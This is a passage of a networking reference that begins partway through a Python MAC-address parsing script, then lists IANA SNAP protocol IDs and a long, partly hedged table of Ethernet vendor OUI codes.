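    octets = parse_mac(text)
    first = octets[0]
    oui = "".join(f"{o:02X}" for o in octets[:3])
    # Multicast bit: low-order bit of the first octet, "the first bit on
    # the wire"; an odd second hex digit means it is set.
    multicast = bool(first & 0x01)
    # Locally administered bit: the next bit up (the 02xxxx addresses above).
    local = bool(first & 0x02)
    info = {
        "hyphenated": fmt_hyphenated(octets),
        "dotted_decimal": fmt_dotted_decimal(octets),
        "oui": oui,
        "vendor": OUI_TABLE.get(oui),
        "multicast": multicast,
        "broadcast": all(o == 0xFF for o in octets),
        "locally_administered": local,
        # Bit order seen by Token Ring hardware: each octet bit-reversed,
        # which turns 00-00-5E into 00-00-7A as the text shows.
        "token_ring_order": fmt_hyphenated([reverse_bits(o) for o in octets]),
    }
    # In IANA's 01-00-5E block the high bit of the 4th octet (memory order)
    # separates Internet multicast (0) from other IANA assignments (1).
    if multicast and oui == "01005E":
        info["internet_multicast"] = not (octets[3] & 0x80)
    return info


def vendor_multicast_prefix(oui):
    """Multicast prefix a vendor derives from its unicast OUI by setting the
    multicast bit, e.g. DEC's 08-00-2B becomes 09-00-2B."""
    octets = [int(oui[i:i + 2], 16) for i in range(0, 6, 2)]
    octets[0] |= 0x01
    return fmt_hyphenated(octets)


if __name__ == "__main__":
    for addr in ("00-00-5E-00-01-01", "01005E7FFFFF",
                 "11:22:AB:C5:9E:6D", "FF-FF-FF-FF-FF-FF"):
        print(addr, describe(addr))
    print("DEC multicast prefix:", vendor_multicast_prefix("08002B"))
```

Running it reports the Linux example's 11:22:AB:C5:9E:6D as multicast (odd second hex digit), which is why it is not a valid station address; a locally administered unicast value keeps the second digit even with bit 1 set (02, 06, 0A, 0E, ...).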



SNAP PROTOCOL IDS IN THE IANA ETHERNET ADDRESS BLOCK

The Sub-Network Access Protocol (SNAP) header contains 40 bits: 24
bits containing an IEEE-assigned Organizationally Unique Identifier
(OUI), and 16 bits containing a Protocol Identifier (PID). The OUIs
are the same as those used in the Ethernet Vendor Address Components
list above. The IANA's OUI, 00-00-5E, may be used in SNAP headers
with the appropriate PID to identify the protocols listed below.

Note that the IANA restricts this list to protocols that are ONLY
identified in this manner; if a protocol has an EtherType, then SNAP
headers identifying that protocol must contain an OUI of 00-00-00,
with the EtherType in the PID field.

The SNAP PID assignments using the IANA's OUI are:

Protocol ID Description References
----------- ----------- ----------
decimal Hex
0001 0001 MARS Data Messages (short form) [RFC2022]
0002 0002 reserved for future NHRP use [RFC2332]
0003 0003 MARS/NHRP Control Messages [RFC2022, 2332]
0004 0004 MARS Data Messages (long form) [RFC2022]
0005 0005 SCSP - Server Cache Sync Protocol [RFC2334]
0006 0006 VRID - Virtual Router MAC Address [Knight]
0007 0007 L2TP [RFC3070]
0008 0008 Virtual Private Network ID [Malis-ID]
0009 0009 MSDP-GRE-Protocol Type [msdp-ID]







Vendor Codes For Ethernet Interfaces :-



000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000009 powerpipes?
00000C Cisco
00000E Fujitsu
00000F NeXT
000010 Hughes LAN Systems (formerly Sytek)
000011 Tektronix
000015 Datapoint Corporation
000018 Webster Computer Corporation Appletalk/Ethernet Gateway
00001A AMD (?)
00001B Novell (now Eagle Technology)
00001C JDR Microdevices generic, NE2000 drivers
00001D Cabletron
00001F Cryptall Communications Corp.
000020 DIAB (Data Industrier AB)
000021 SC&C (PAM Soft&Hardware also reported)
000022 Visual Technology
000023 ABB Automation AB, Dept. Q
000024 Olicom
000029 IMC
00002A TRW
00002C NRC - Network Resources Corporation - MultiGate Hub1+, Hub2, etc
000032 GPT Limited (reassigned from GEC Computers Ltd)
000037 Oxford Metrics Ltd
00003B Hyundai/Axil Sun clones
00003C Auspex
00003D AT&T
00003F Syntrex Inc
000044 Castelle
000046 ISC-Bunker Ramo, An Olivetti Company
000048 Epson
000049 Apricot Ltd.
00004B APT -ICL also reported
00004C NEC Corporation
00004F Logicraft 386-Ware P.C. Emulator
000051 Hob Electronic Gmbh & Co. KG
000052 Optical Data Systems
000055 AT&T
000058 Racore Computer Products Inc
00005A SK (Schneider & Koch in Europe and Syskonnect outside of Europe)
00005A Xerox 806 (unregistered)
00005B Eltec
00005D RCE
00005E U.S. Department of Defense (IANA)
00005F Sumitomo
000061 Gateway Communications
000062 Honeywell
000063 Hewlett-Packard LanProbe
000064 Yokogawa Digital Computer Corp
000065 Network General
000066 Talaris
000068 Rosemount Controls
000069 Concord Communications, Inc (although someone said Silicon Graphics)
00006B MIPS
00006D Case
00006E Artisoft, Inc.
00006F Madge Networks Ltd. Token-ring adapters
000073 DuPont
000075 Bell Northern Research (BNR)
000077 Interphase [Used in other systems, e.g. MIPS, Motorola]
000078 Labtam Australia
000079 Networth Incorporated [bought by Compaq, used in Netelligent series]
00007A Ardent
00007B Research Machines
00007D Cray Research Superservers,Inc [Also Harris (3M) (old)]
00007E NetFRAME multiprocessor network servers
00007F Linotype-Hell AG Linotronic typesetters
000080 Cray Communications (formerly Dowty Network Services) [Also shows as "Harris (3M) (new)" and/or "Imagen(?)" elsewhere]
000081 Synoptics
000083 Tadpole Technology [had Optical Data Systems which is wrong according to both]
000084 Aquila (?), ADI Systems Inc.(?)
000086 Gateway Communications Inc. (then Megahertz & now 3com)
000087 Hitachi
000089 Cayman Systems Gatorbox
00008A Datahouse Information Systems
00008E Solbourne(?), Jupiter(?) (I've had confirming mail on Solbourne)
000092 Unisys, Cogent (both reported)
000093 Proteon
000094 Asante MAC
000095 Sony/Tektronix
000097 Epoch
000098 Cross Com
000099 Memorex Telex Corporations
00009F Ameristar Technology
0000A0 Sanyo Electronics
0000A2 Wellfleet
0000A3 Network Application Technology (NAT)
0000A4 Acorn
0000A5 Compatible Systems Corporation
0000A6 Network General (internal assignment, not for products)
0000A7 Network Computing Devices (NCD) X-terminals
0000A8 Stratus Computer, Inc.
0000A9 Network Systems
0000AA Xerox Xerox machines
0000AC Conware Netzpartner [had Apollo, claimed incorrect]
0000AE Dassault Automatismes et Telecommunications
0000AF Nuclear Data Acquisition Interface Modules (AIM)
0000B0 RND (RAD Network Devices)
0000B1 Alpha Microsystems Inc.
0000B3 CIMLinc
0000B4 Edimax
0000B5 Datability Terminal Servers
0000B6 Micro-matic Research
0000B7 Dove Fastnet
0000BB TRI-DATA Systems Inc. Netway products, 3274 emulators
0000BC Allen-Bradley
0000C0 Western Digital now SMC (Std. Microsystems Corp.)
0000C1 Olicom A/S
0000C5 Farallon Computing Inc
0000C6 HP Intelligent Networks Operation (formerly Eon Systems)
0000C8 Altos
0000C9 Emulex Terminal Servers, Print Servers
0000CA LANcity Cable Modems (now owned by BayNetworks)
0000CC Densan Co., Ltd.
0000CD Industrial Research Limited
0000D0 Develcon Electronics, Ltd.
0000D1 Adaptec, Inc. "Nodem" product
0000D2 SBE Inc
0000D3 Wang Labs
0000D4 PureData
0000D7 Dartmouth College (NED Router)
0000D8 old Novell NE1000's (before about 1987?) (also 3Com)
0000DD Gould
0000DE Unigraph
0000E1 Hitachi (laptop built-in)
0000E2 Acer Counterpoint
0000E3 Integrated Micro Products Ltd
0000E4 mips?
0000E6 Aptor Produits De Comm Indust
0000E8 Accton Technology Corporation
0000E9 ISICAD, Inc.
0000ED April
0000EE Network Designers Limited [also KNX Ltd, a former division]
0000EF Alantec (now owned by ForeSystems)
0000F0 Samsung
0000F2 Spider Communications (Montreal, not Spider Systems)
0000F3 Gandalf Data Ltd. - Canada
0000F4 Allied Telesis, Inc.
0000F6 A.M.C. (Applied Microsystems Corp.)
0000F8 DEC
0000FB Rechner zur Kommunikation
0000FD High Level Hardware (Orion, UK)
0000FF Camtec Electronics (UK) Ltd.
000102 BBN (Bolt Beranek and Newman, Inc.) internal usage (not registered)
000143 IEEE 802
000150 Megahertz (now 3com) modem
000163 NDC (National Datacomm Corporation)
000168 W&G (Wandel & Goltermann) [incorrect according to W&G]
0001C8 Thomas Conrad Corp.
0001FA Compaq (PageMarq printers)
000204 Novell NE3200
000205 Hamilton (Sparc Clones)
000216 ESI (Extended Systems, Inc) print servers
000288 Global Village (PCcard in Mac portable)
0003C6 Morning Star Technologies Inc
000400 Lexmark (Print Server)
0004AC IBM PCMCIA Ethernet adapter.
000502 Apple (PCI bus Macs)
00059A PowerComputing (Mac clone)
0005A8 PowerComputing Mac clones
00060D Hewlett-Packard JetDirect token-ring interfaces
000629 IBM RISC6000 system
00067C Cisco
0006C1 Cisco
000701 Racal-Datacom
00070D Cisco 2511 Token Ring
000852 Technically Elite Concepts
000855 Fermilab
0008C7 Compaq
001007 Cisco Systems Catalyst 1900
00100B Cisco Systems
00100D Cisco Systems Catalyst 2924-XL
001011 Cisco Systems Cisco 75xx
00101F Cisco Systems Catalyst 2901
001029 Cisco Systems Catalyst 5000
00102F Cisco Systems Cisco 5000
00104B 3Com 3C905-TX PCI
00105A 3Com Fast Etherlink XL in a Gateway 2000
001060 Billington Novell NE200 Compatible
001079 Cisco 5500 Router
00107A Ambicom (was Tandy?)
00107B Cisco Systems
001083 HP-UX E 9000/889
0010A4 Xircom RealPort 10/100 PC Card
0010A6 Cisco
0010D7 Argosy EN 220 Fast Ethernet PCMCIA
0010F6 Cisco
001700 Kabel
002000 Lexmark (Print Server)
002005 simpletech
002008 Cable & Computer Technology
00200C Adastra Systems Corp
002011 Canopus Co Ltd
002017 Orbotech
002018 Realtek
00201A Nbase
002025 Control Technology Inc (Industrial Controls and Network Interfaces)
002028 Bloomberg
002029 TeleProcessing CSU/DSU (now owned by ADC/Kentrox)
00202B ATML (Advanced Telecommunications Modules, Ltd.)
002035 IBM (International Business Machines) mainframes, Etherjet printers
002036 BMC Software
002042 Datametrics Corp
002045 SolCom Systems Limited
002048 Fore Systems Inc
00204B Autocomputer Co Ltd
00204C Mitron Computer Pte Ltd
002056 Neoproducts
002061 Dynatech Communications Inc
002063 Wipro Infotech Ltd
002066 General Magic Inc
002067 Node Runner Inc
00206B Minolta Co., Ltd Network printers
002078 Runtop Inc
002085 3COM SuperStack II UPS management module
00208A Sonix Communications Ltd
00208B Focus Enhancements
00208C Galaxy Networks Inc
002094 Cubix Corporation
0020A5 Newer Technology
0020A6 Proxim Inc
0020A7 Pairgain Technologies, Inc.
0020AF 3COM Corporation
0020B2 CSP (Printline Multiconnectivity converter)
0020B6 Agile Networks Inc
0020B9 Metricom, Inc.
0020C5 Eagle NE2000
0020C6 NECTEC
0020D0 Versalynx Corp. "The One Port" terminal server
0020D2 RAD Data Communications Ltd
0020D3 OST (Ouet Standard Telematique)
0020D8 NetWave
0020DA Xylan
0020DC Densitron Taiwan Ltd
0020E0 PreMax PE-200 (PCMCIA NE2000-clone card, sold by InfoExpress)
0020E5 Apex Data
0020EE Gtech Corporation
0020F6 Net Tek & Karlnet Inc
0020F8 Carrera Computers Inc
0020FC Matrox
004001 Zero One Technology Co Ltd (ZyXEL?)
004005 TRENDware International Inc.; Linksys; Simple Net; all three reported
004009 Tachibana Tectron Co Ltd
00400B Crescendo (now owned by Cisco)
00400C General Micro Systems, Inc.
00400D LANNET Data Communications
004010 Sonic Mac Ethernet interfaces
004011 Facilities Andover Environmental Controllers
004013 NTT Data Communication Systems Corp
004014 Comsoft Gmbh
004015 Ascom
004017 XCd XJet - HP printer server card
00401C AST Pentium/90 PC (emulating AMD EISA card)
00401F Colorgraph Ltd
004020 Pilkington Communication
004023 Logic Corporation
004025 Molecular Dynamics
004026 Melco Inc
004027 SMC Massachusetts [Had:Sigma (?), maybe the "S"?]
004028 Netcomm
00402A Canoga-Perkins
00402B TriGem
00402F Xlnt Designs Inc (XDI)
004030 GK Computer
004032 Digital Communications
004033 Addtron Technology Co., Ltd.
004036 TribeStar
004039 Optec Daiichi Denko Co Ltd
00403C Forks, Inc.
004041 Fujikura Ltd.
004043 Nokia Data Communications
004048 SMD Informatica S.A.
00404C Hypertec Pty Ltd.
00404D Telecomm Techniques
00404F Space & Naval Warfare Systems
004050 Ironics, Incorporated
004052 Star Technologies Inc
004053 Datum [Bancomm Division] TymServe 2000
004054 Thinking Machines Corporation
004057 Lockheed-Sanders
004059 Yoshida Kogyo K.K.
00405B Funasset Limited
00405D Star-Tek Inc
004066 Hitachi Cable, Ltd.
004067 Omnibyte Corporation
004068 Extended Systems
004069 Lemcom Systems Inc
00406A Kentek Information Systems Inc
00406E Corollary, Inc.
00406F Sync Research Inc
004072 Applied Innovation
004074 Cable and Wireless
004076 AMP Incorporated
004078 Wearnes Automation Pte Ltd
00407F Agema Infrared Systems AB
004082 Laboratory Equipment Corp
004085 SAAB Instruments AB
004086 Michels & Kleberhoff Computer
004087 Ubitrex Corporation
004088 Mobuis NuBus (Mac) combination video/EtherTalk
00408A TPS Teleprocessing Sys. Gmbh
00408C Axis Communications AB
00408E CXR/Digilog
00408F WM-Data Minfo AB
004090 Ansel Communications PC NE2000 compatible twisted-pair ethernet cards
004091 Procomp Industria Eletronica
004092 ASP Computer Products, Inc.
004094 Shographics Inc
004095 Eagle Technologies [UMC also reported]
004096 Telesystems SLW Inc
00409A Network Express Inc
00409C Transware
00409D DigiBoard Ethernet-ISDN bridges
00409E Concurrent Technologies Ltd.
00409F Lancast/Casat Technology Inc
0040A4 Rose Electronics
0040A6 Cray Research Inc.
0040AA Valmet Automation Inc
0040AD SMA Regelsysteme Gmbh
0040AE Delta Controls, Inc.
0040AF Digital Products, Inc. (DPI).
0040B4 3COM K.K.
0040B5 Video Technology Computers Ltd
0040B6 Computerm Corporation
0040B9 MACQ Electronique SA
0040BD Starlight Networks Inc
0040C1 Bizerba-Werke Wilheim Kraut
0040C2 Applied Computing Devices
0040C3 Fischer and Porter Co.
0040C5 Micom Communications Corp.
0040C6 Fibernet Research, Inc.
0040C7 Danpex Corporation
0040C8 Milan Technology Corp.
0040CC Silcom Manufacturing Technology Inc
0040CF Strawberry Tree Inc
0040D0 DEC/Compaq
0040D2 Pagine Corporation
0040D4 Gage Talker Corp.
0040D7 Studio Gen Inc
0040D8 Ocean Office Automation Ltd
0040DC Tritec Electronic Gmbh
0040DF Digalog Systems, Inc.
0040E1 Marner International Inc
0040E2 Mesa Ridge Technologies Inc
0040E3 Quin Systems Ltd
0040E5 Sybus Corporation
0040E7 Arnos Instruments & Computer
0040E9 Accord Systems, Inc.
0040EA PlainTree Systems Inc
0040ED Network Controls International Inc
0040F0 Micro Systems Inc
0040F1 Chuo Electronics Co., Ltd.
0040F4 Cameo Communications, Inc.
0040F5 OEM Engines
0040F6 Katron Computers Inc
0040F9 Combinet
0040FA Microboards Inc
0040FB Cascade Communications Corp.
0040FD LXE
0040FF Telebit Corporation Personal NetBlazer
004854 Digital SemiConductor 21143/2 based 10/100
004F49 Realtek
004F4B Pine Technology Ltd.
005004 3com 3C90X
00500F Cisco
00504D Repotec Group
00504E UMC UM9008 NE2000-compatible ISA Card for PC
005050 Cisco
005069 PixStream Incorporated
0050BD Cisco
0050E2 Cisco
005500 Xerox
006008 3Com 3Com PCI form factor 3C905 TX board
006009 Cisco Catalyst 5000 Ethernet switch
006025 Active Imaging Inc.
00602F Cisco
006030 VillageTronic used on Amiga
00603E Cisco 100Mbps interface
006047 Cisco
00604E Cycle Computer (Sun MotherBoard Replacements)
006052 Realtek (RTL 8029 == PCI NE2000)
00605C Cisco
006067 Acer Lan
006070 Cisco routers (2524 and 4500)
006083 Cisco Systems, Inc. 3620/3640 routers
00608C 3Com (1990 onwards)
006094 AMD PCNET PCI
006097 3Com
0060B0 Hewlett-Packard
0060F5 Phobos FastEthernet for Unix WS
008000 Multitech Systems Inc
008001 Periphonics Corporation
008004 Antlow Computers, Ltd.
008005 Cactus Computer Inc.
008006 Compuadd Corporation
008007 Dlog NC-Systeme
008009 Jupiter Systems (older MX-600 series machines)
00800D Vosswinkel FU
00800F SMC (Standard Microsystem Corp.)
008010 Commodore
008012 IMS Corp. IMS failure analysis tester
008013 Thomas Conrad Corp.
008015 Seiko Systems Inc
008016 Wandel & Goltermann
008017 PFU
008019 Dayna Communications "Etherprint" product
00801A Bell Atlantic
00801B Kodiak Technology
00801C Cisco
008021 Newbridge Networks Corporation
008023 Integrated Business Networks
008024 Kalpana
008026 Network Products Corporation
008029 Microdyne Corporation
00802A Test Systems & Simulations Inc
00802C The Sage Group PLC
00802D Xylogics, Inc. Annex terminal servers
00802E Plexcom, Inc.
008033 Formation (?)
008034 SMT-Goupil
008035 Technology Works
008037 Ericsson Business Comm.
008038 Data Research & Applications
00803B APT Communications, Inc.
00803D Surigiken Co Ltd
00803E Synernetics
00803F Hyundai Electronics
008042 Force Computers
008043 Networld Inc
008045 Matsushita Electric Ind Co
008046 University of Toronto
008048 Compex, used by Commodore and DEC at least
008049 Nissin Electric Co Ltd
00804C Contec Co., Ltd.
00804D Cyclone Microsystems, Inc.
008051 ADC Fibermux
008052 Network Professor
008057 Adsoft Ltd
00805A Tulip Computers International BV
00805B Condor Systems, Inc.
00805C Agilis(?)
00805F Compaq Computer Corporation
008060 Network Interface Corporation
008062 Interface Co.
008063 Richard Hirschmann Gmbh & Co
008064 Wyse
008067 Square D Company
008069 Computone Systems
00806A ERI (Empac Research Inc.)
00806B Schmid Telecommunication
00806C Cegelec Projects Ltd
00806D Century Systems Corp.
00806E Nippon Steel Corporation
00806F Onelan Ltd
008071 SAI Technology
008072 Microplex Systems Ltd
008074 Fisher Controls
008079 Microbus Designs Ltd
00807B Artel Communications Corp.
00807C FiberCom
00807D Equinox Systems Inc
008082 PEP Modular Computers Gmbh
008086 Computer Generation Inc.
008087 Okidata
00808A Summit (?)
00808B Dacoll Limited
00808C Netscout Systems (formerly Frontier Software Development)
00808D Westcove Technology BV
00808E Radstone Technology
008090 Microtek International Inc
008092 Japan Computer Industry, Inc.
008093 Xyron Corporation
008094 Sattcontrol AB
008096 HDS (Human Designed Systems) X terminals
008098 TDK Corporation
00809A Novus Networks Ltd
00809B Justsystem Corporation
00809D Datacraft Manufactur'g Pty Ltd
00809F Alcatel Business Systems
0080A1 Microtest
0080A3 Lantronix (see also 0800A3)
0080A6 Republic Technology Inc
0080A7 Measurex Corp
0080AD CNet Technology Used by Telebit (among others)
0080AE Hughes Network Systems
0080AF Allumer Co., Ltd.
0080B1 Softcom A/S
0080B2 NET (Network Equipment Technologies)
0080B6 Themis corporation
0080BA Specialix (Asia) Pte Ltd
0080C0 Penril Datability Networks
0080C2 IEEE 802.1 Committee
0080C6 Soho
0080C7 Xircom, Inc.
0080C8 D-Link (also Solectek Pocket Adapters, and LinkSys PCMCIA)
0080C9 Alberta Microelectronic Centre
0080CE Broadcast Television Systems
0080D0 Computer Products International
0080D3 Shiva Appletalk-Ethernet interface
0080D4 Chase Limited
0080D6 Apple Mac Portable(?)
0080D7 Fantum Electronics
0080D8 Network Peripherals
0080DA Bruel & Kjaer
0080E0 XTP Systems Inc
0080E3 Coral (?)
0080E7 Lynwood Scientific Dev Ltd
0080EA The Fiber Company
0080F0 Kyushu Matsushita Electric Co
0080F1 Opus
0080F3 Sun Electronics Corp
0080F4 Telemechanique Electrique
0080F5 Quantel Ltd
0080F7 Zenith Communications Products
0080FB BVM Limited
0080FE Azure Technologies Inc
009004 3Com
009027 Intel
00902B Cisco Ethernet Switches and Light Streams
009086 Cisco
009092 Cisco
0090AB Cisco
0090B1 Cisco
0090F2 Cisco Ethernet Switches and Light Streams
00A000 Bay Networks Ethernet switch
00A00C Kingmax Technology Inc. PCMCIA card
00A024 3com
00A040 Apple (PCI Mac)
00A04B Sonic Systems Inc. EtherFE 10/100 PCI for Mac or PC
00A073 Com21
00A083 Intel
00A092 Intermate International [LAN printer interfaces]
00A0AE Network Peripherals, Inc.
00A0C8 Adtran, Inc.
00A0C9 Intel (PRO100B and PRO100+) [used on Cisco PIX firewall among others]
00A0CC Lite-On (used by MacSense in Adapter for Mac, also seen in PCs)
00A0D1 National Semiconductor [COMPAQ Docking Station]
00A0D2 Allied Telesyn
00AA00 Intel
00B0D0 Computer Products International
00C000 Lanoptics Ltd
00C001 Diatek Patient Managment
00C002 Sercomm Corporation
00C003 Globalnet Communications
00C004 Japan Business Computer Co.Ltd
00C005 Livingston Enterprises Inc Portmaster (OEMed by Cayman)
00C006 Nippon Avionics Co Ltd
00C007 Pinnacle Data Systems Inc
00C008 Seco SRL
00C009 KT Technology (s) Pte Inc
00C00A Micro Craft
00C00B Norcontrol A.S.
00C00C ARK PC Technology, Inc.
00C00D Advanced Logic Research Inc
00C00E Psitech Inc
00C00F QNX Software Systems Ltd. [also Quantum Software Systems Ltd]
00C011 Interactive Computing Devices
00C012 Netspan Corp
00C013 Netrix
00C014 Telematics Calabasas
00C015 New Media Corp
00C016 Electronic Theatre Controls
00C017 Fluke
00C018 Lanart Corp
00C01A Corometrics Medical Systems
00C01B Socket Communications
00C01C Interlink Communications Ltd.
00C01D Grand Junction Networks, Inc. (Cisco Catalyst also reported)
00C01F S.E.R.C.E.L.
00C020 Arco Electronic, Control Ltd.
00C021 Netexpress
00C023 Tutankhamon Electronics
00C024 Eden Sistemas De Computacao SA
00C025 Dataproducts Corporation
00C027 Cipher Systems, Inc.
00C028 Jasco Corporation
00C029 Kabel Rheydt AG
00C02A Ohkura Electric Co
00C02B Gerloff Gesellschaft Fur
00C02C Centrum Communications, Inc.
00C02D Fuji Photo Film Co., Ltd.
00C02E Netwiz
00C02F Okuma Corp
00C030 Integrated Engineering B. V.
00C031 Design Research Systems, Inc.
00C032 I-Cubed Limited
00C033 Telebit Corporation
00C034 Dale Computer Corporation
00C035 Quintar Company
00C036 Raytech Electronic Corp
00C039 Silicon Systems
00C03B Multiaccess Computing Corp
00C03C Tower Tech S.R.L.
00C03D Wiesemann & Theis Gmbh
00C03E Fa. Gebr. Heller Gmbh
00C03F Stores Automated Systems Inc
00C040 ECCI
00C041 Digital Transmission Systems
00C042 Datalux Corp.
00C043 Stratacom
00C044 Emcom Corporation
00C045 Isolation Systems Inc
00C046 Kemitron Ltd
00C047 Unimicro Systems Inc
00C048 Bay Technical Associates
00C049 US Robotics Total Control (tm) NETServer Card
00C04D Mitec Ltd
00C04E Comtrol Corporation
00C04F Dell
00C050 Toyo Denki Seizo K.K.
00C051 Advanced Integration Research
00C055 Modular Computing Technologies
00C056 Somelec
00C057 Myco Electronics
00C058 Dataexpert Corp
00C059 Nippondenso Corp
00C05B Networks Northwest Inc
00C05C Elonex PLC
00C05D L&N Technologies
00C05E Vari-Lite Inc
00C060 ID Scandinavia A/S
00C061 Solectek Corporation
00C063 Morning Star Technologies Inc May be miswrite of 0003C6
00C064 General Datacomm Ind Inc
00C065 Scope Communications Inc
00C066 Docupoint, Inc.
00C067 United Barcode Industries
00C068 Philp Drake Electronics Ltd
00C069 California Microwave Inc
00C06A Zahner-Elektrik Gmbh & Co KG
00C06B OSI Plus Corporation
00C06C SVEC Computer Corp
00C06D Boca Research, Inc.
00C06F Komatsu Ltd
00C070 Sectra Secure-Transmission AB
00C071 Areanex Communications, Inc.
00C072 KNX Ltd
00C073 Xedia Corporation
00C074 Toyoda Automatic Loom Works Ltd
00C075 Xante Corporation
00C076 I-Data International A-S
00C077 Daewoo Telecom Ltd
00C078 Computer Systems Engineering
00C079 Fonsys Co Ltd
00C07A Priva BV
00C07B Ascend Communications ISDN bridges/routers
00C07D RISC Developments Ltd
00C07F Nupon Computing Corp
00C080 Netstar Inc
00C081 Metrodata Ltd
00C082 Moore Products Co
00C084 Data Link Corp Ltd
00C085 Canon
00C086 The Lynk Corporation
00C087 UUNET Technologies Inc
00C089 Telindus Distribution
00C08A Lauterbach Datentechnik Gmbh
00C08B RISQ Modular Systems Inc
00C08C Performance Technologies Inc
00C08D Tronix Product Development
00C08E Network Information Technology
00C08F Matsushita Electric Works, Ltd.
00C090 Praim S.R.L.
00C091 Jabil Circuit, Inc.
00C092 Mennen Medical Inc
00C093 Alta Research Corp.
00C095 Znyx (Network Appliance); Jupiter Systems (MX-700); Apple (G3) all seen
00C096 Tamura Corporation
00C097 Archipel SA
00C098 Chuntex Electronic Co., Ltd.
00C09B Reliance Comm/Tec, R-Tec Systems Inc
00C09C TOA Electronic Ltd
00C09D Distributed Systems Int'l, Inc.
00C09F Quanta Computer Inc
00C0A0 Advance Micro Research, Inc.
00C0A1 Tokyo Denshi Sekei Co
00C0A2 Intermedium A/S
00C0A3 Dual Enterprises Corporation
00C0A4 Unigraf OY
00C0A7 SEEL Ltd
00C0A8 GVC Corporation
00C0A9 Barron McCann Ltd
00C0AA Silicon Valley Computer
00C0AB Jupiter Technology Inc
00C0AC Gambit Computer Communications
00C0AD Computer Communication Systems
00C0AE Towercom Co Inc DBA PC House
00C0B0 GCC Technologies,Inc.
00C0B2 Norand Corporation
00C0B3 Comstat Datacomm Corporation
00C0B4 Myson Technology Inc
00C0B5 Corporate Network Systems Inc
00C0B6 Meridian Data Inc
00C0B7 American Power Conversion Corp
00C0B8 Fraser's Hill Ltd.
00C0B9 Funk Software Inc
00C0BA Netvantage
00C0BB Forval Creative Inc
00C0BD Inex Technologies, Inc.
00C0BE Alcatel - Sel
00C0BF Technology Concepts Ltd
00C0C0 Shore Microsystems Inc
00C0C1 Quad/Graphics Inc
00C0C2 Infinite Networks Ltd.
00C0C3 Acuson Computed Sonography
00C0C4 Computer Operational
00C0C5 SID Informatica
00C0C6 Personal Media Corp
00C0C8 Micro Byte Pty Ltd
00C0C9 Bailey Controls Co
00C0CA Alfa, Inc.
00C0CB Control Technology Corporation
00C0CD Comelta S.A.
00C0D0 Ratoc System Inc
00C0D1 Comtree Technology Corporation (EFA also reported)
00C0D2 Syntellect Inc
00C0D4 Axon Networks Inc
00C0D5 Quancom Electronic Gmbh
00C0D6 J1 Systems, Inc.
00C0D9 Quinte Network Confidentiality Equipment Inc
00C0DB IPC Corporation (Pte) Ltd
00C0DC EOS Technologies, Inc.
00C0DE ZComm Inc
00C0DF Kye Systems Corp
00C0E1 Sonic Solutions
00C0E2 Calcomp, Inc.
00C0E3 Ositech Communications Inc
00C0E4 Landis & Gyr Powers Inc
00C0E5 GESPAC S.A.
00C0E6 TXPORT
00C0E7 Fiberdata AB
00C0E8 Plexcom Inc
00C0E9 Oak Solutions Ltd
00C0EA Array Technology Ltd.
00C0EC Dauphin Technology
00C0ED US Army Electronic Proving Ground
00C0EE Kyocera Corporation
00C0EF Abit Corporation
00C0F0 Kingston Technology Corporation
00C0F1 Shinko Electric Co Ltd
00C0F2 Transition Engineering Inc
00C0F3 Network Communications Corp
00C0F4 Interlink System Co., Ltd.
00C0F5 Metacomp Inc
00C0F6 Celan Technology Inc.
00C0F7 Engage Communication, Inc.
00C0F8 About Computing Inc.
00C0FA Canary Communications Inc
00C0FB Advanced Technology Labs
00C0FC ASDG Incorporated
00C0FD Prosum
00C0FF Box Hill Systems Corporation
00DD00 Ungermann-Bass IBM RT
00DD01 Ungermann-Bass
00DD08 Ungermann-Bass
00E011 Uniden Corporation
00E014 Cisco
00E016 rapid-city (now a part of bay networks)
00E018 Asustek Intel 82558-based Integrated Fast Ethernet for WIM
00E01E Cisco
00E029 SMC EtherPower II 10/100
00E02C AST - built into 5166M PC motherboard (win95 id's as Intel)
00E034 Cisco
00E039 Paradyne 7112 T1 DSU/CSU
00E04F Cisco
00E07D Encore (Netronix?) 10/100 PCI Fast ethernet card
00E081 Tyan Computer Corp. Onboard Intel 82558 10/100
00E083 Jato Technologies, Inc.
00E08F Cisco Systems Catalyst 2900 series
00E098 Linksys PCMCIA card
00E0A3 Cisco Systems Catalyst 1924
00E0B0 Cisco Systems Various systems reported
00E0B8 AMD PCNet in a Gateway 2000
00E0C5 BCOM Electronics Inc.
00E0ED New Link
00E0F7 Cisco
00E0F9 Cisco
00E0FE Cisco
020406 BBN internal usage (not registered)
020701 Interlan [now Racal-InterLAN] DEC (UNIBUS or QBUS), Apollo, Cisco
020701 Racal-Datacom
026060 3Com
026086 Satelcom MegaPac (UK)
02608C 3Com IBM PC; Imagen; Valid; Cisco; Macintosh
02A0C9 Intel
02AA3C Olivetti
02CF1F CMC Masscomp; Silicon Graphics; Prime EXL
02E03B Prominet Corporation Gigabit Ethernet Switch
02E6D3 BTI (Bus-Tech, Inc.) IBM Mainframes
048845 Bay Networks token ring line card
080001 Computer Vision
080002 3Com (formerly Bridge)
080003 ACC (Advanced Computer Communications)
080005 Symbolics Symbolics LISP machines
080006 Siemens Nixdorf PC clone
080007 Apple
080008 BBN (Bolt Beranek and Newman, Inc.)
080009 Hewlett-Packard
08000A Nestar Systems
08000B Unisys also Ascom-Timeplex (former Unisys subsidiary)
08000D ICL (International Computers, Ltd.)
08000E NCR/AT&T
08000F SMC (Standard Microsystems Corp.)
080010 AT&T [misrepresentation of 800010?]
080011 Tektronix, Inc.
080014 Excelan BBN Butterfly, Masscomp, Silicon Graphics
080017 National Semiconductor Corp. (used to have Network System Corp., wrong NSC)
08001A Tiara? (used to have Data General)
08001B Data General
08001E Apollo
08001F Sharp
080020 Sun
080022 NBI (Nothing But Initials)
080023 Matsushita Denso
080025 CDC
080026 Norsk Data (Nord)
080027 PCS Computer Systems GmbH
080028 TI Explorer
08002B DEC
08002E Metaphor
08002F Prime Computer Prime 50-Series LHC300
080030 CERN
080032 Tigan
080036 Intergraph CAE stations
080037 Fuji Xerox
080038 Bull
080039 Spider Systems
08003B Torus Systems
08003D cadnetix
08003E Motorola VME bus processor modules
080041 DCA (Digital Comm. Assoc.)
080044 DSI (DAVID Systems, Inc.)
080045 ???? (maybe Xylogics, but they claim not to know this number)
080046 Sony
080047 Sequent
080048 Eurotherm Gauging Systems
080049 Univation
08004C Encore
08004E BICC [3com bought BICC, so may appear on 3com equipment as well]
080051 Experdata
080056 Stanford University
080057 Evans & Sutherland (?)
080058 ??? DECsystem-20
08005A IBM
080066 AGFA printers, phototypesetters etc.
080067 Comdesign
080068 Ridge
080069 Silicon Graphics
